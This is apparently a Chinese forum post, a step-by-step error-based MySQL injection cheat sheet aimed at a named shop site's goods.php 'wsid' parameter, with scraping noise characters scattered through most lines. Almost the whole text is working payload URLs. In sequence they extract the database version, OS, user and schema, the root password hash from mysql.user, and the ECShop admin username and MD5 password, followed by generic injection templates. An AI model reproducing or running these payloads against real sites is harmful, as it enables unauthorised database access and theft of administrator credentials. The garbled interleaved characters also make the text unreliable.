判断版本号
0 ^, i l0 m; s2 Y/ p5 l; |http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& T% G' x8 N( k4 z
1 @3 p% _) p5 d) v5 u
判断系统! m5 e" E# u6 P( e
) P# N" ^8 Y: n/ ?( k% shttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23) B ~, M( {+ K9 a7 [$ ^+ p7 z
6 t: V% ^9 ?9 _1 l
; [4 E+ W1 K$ v7 {
) S( Z4 \- {1 [3 Y1 A
当前 user()
' z0 c/ m0 N6 X& d0 @ p
, Z% z7 a U- ~3 H! |http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23( r! G) Q0 ]( s( V1 Y
( y, t2 S$ h$ r
9 z% D9 m8 V- k1 \$ W% K# z+ `# n5 A4 U$ Q" _
当前 database()% g' x* y& u1 S6 O. I. e3 ?
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23. {% r# ?& D+ Z8 h- E* A8 D
! @' t. W4 C; h! \" _
- M3 K, B/ [4 a
2 }% |: v S9 c5 c9 A
M" x8 G; J+ J; m+ H5 I+ B+ kroot hash
2 k% J+ Y- m8 G4 e
6 ?" U6 ]) a: `2 {! N7 I* C+ Rhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23# A7 A* `" F9 f% J8 ^
% e- Q5 _) ]* f* y0 a, K$ w, p
- v- u- [5 m! T% @) ^
$ ?( S, S$ E, w$ g" Q" K7 K4 C9 U当前 数据库表名
3 D! {4 e% y8 M; F
& J$ R* `' l: [http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
- O$ ]2 o0 O% B. o7 A& a/ B& c6 G% G6 P% Q
/ x' {) G9 ?0 e$ [: F5 A) K$ V4 \4 Y @: v0 E% V9 {! Y/ b( g+ a! |7 j
当前 数据库 user_name 字段# U+ Q' A% K& E, R2 T. M, A
: ]2 t) Q8 O }* [0 E1 _http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 ?* B$ _8 e! w4 T& i& v
& V) G6 s% D2 j8 g7 u
当前 数据库 字段 password
$ Z: G H# Y4 l! V$ _4 B7 vhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
, m: u$ B0 \, n- k# {, D+ N0 Q! P) v, S8 u( V0 `& _8 f0 z
2 e$ @: R; ]1 X8 x& x) E" {9 |
# m3 E. o6 u( [& f6 a获得 admin passwd(md5)' k1 r4 X) U5 }8 I, X3 Y7 @
: _; j9 Q4 j6 ]/ p* |, I
. j% |6 l9 ]& ^9 }! \" Nhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23* H. c( i& `: C. t2 L$ ^
& u7 G( B; O$ y( T! L0 J2 w报错注射' e6 B; C$ `* w
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)7 Q! V, T+ h. s( j, _; T$ S
0 O/ _) |# I! |5 ?SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)5 T ?- n, d" {3 c2 \
" l R9 f2 L' Q0 q: @+ X7 Rand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |